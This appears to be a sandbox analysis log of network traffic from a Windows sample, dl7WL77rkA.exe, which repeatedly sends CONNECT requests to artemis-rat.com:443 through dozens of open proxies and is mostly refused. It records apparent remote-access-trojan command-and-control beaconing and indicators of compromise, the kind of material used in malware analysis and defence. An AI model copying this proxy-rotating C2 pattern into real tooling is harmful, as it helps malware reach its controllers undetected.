Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1552192.168.2.55377860.211.195.150108003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.084198952 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1553192.168.2.554116111.88.240.20110803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.085722923 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1554192.168.2.554288104.16.108.234803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.088392973 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.243036985 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1555192.168.2.554297172.67.250.212803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.098037004 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.259162903 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1556192.168.2.55411474.118.80.24431283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.098038912 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            1557192.168.2.554299172.67.181.37803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.098160028 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.259756088 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1558192.168.2.554305104.21.194.182803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.100167036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.260032892 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1559192.168.2.554308104.16.105.198803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.109563112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.267565966 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1560192.168.2.554333172.67.182.22803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.121196032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.275244951 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1561192.168.2.554127113.204.4.142108003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.121524096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1562192.168.2.550163162.241.158.204529803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.121619940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.201778889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.202163935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.201958895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1563192.168.2.55418294.23.252.16891803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.122932911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1564 | 192.168.2.5 | 52866 | 51.75.122.80 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.125768900 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.202020884 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.214446068 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:57.217273951 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1565 | 192.168.2.5 | 54171 | 130.255.162.199 | 20398 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.130609989 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.889527082 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.905319929 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1566 | 192.168.2.5 | 50153 | 165.227.104.122 | 29992 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.133182049 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.201910973 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.202167034 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:57.201977968 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1567 | 192.168.2.5 | 52795 | 159.223.71.71 | 61818 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.144768000 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.202044010 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.214451075 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:57.217273951 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1568192.168.2.55419147.243.114.19281803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.148956060 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.466634989 CET | 311 | IN | HTTP/1.1 400 Bad Request
Server: nginx
Date: Mon, 11 Mar 2024 02:30:45 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1569 | 192.168.2.5 | 54173 | 20.206.106.192 | 8123 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.149629116 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.472440004 CET | 319 | IN | HTTP/1.1 403 Forbidden
Server: squid
Mime-Version: 1.0
Date: Mon, 11 Mar 2024 02:30:45 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 17
X-Squid-Error: ERR_ACCESS_DENIED 0
X-Cache: MISS from cdn-fintech.info
X-Cache-Lookup: NONE from cdn-fintech.info:8123
Connection: keep-alive
Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
Data Ascii: ERR_ACCESS_DENIED


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1570192.168.2.554281177.93.45.1549993876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.151153088 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.796387911 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.702383995 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.794872999 CET | 19 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1571192.168.2.554399172.67.182.3803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.159410954 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.313966036 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1572192.168.2.55422220.205.61.143803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.162138939 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.468919992 CET | 319 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 17
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            X-Cache: MISS from cdn-fintech.info
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                                                                                                                                                                            Data Ascii: ERR_ACCESS_DENIED


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1573192.168.2.554397104.238.111.10779993876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.164700031 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.796206951 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.405407906 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.572479963 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.702205896 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.014607906 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.202358961 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:58.514554977 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


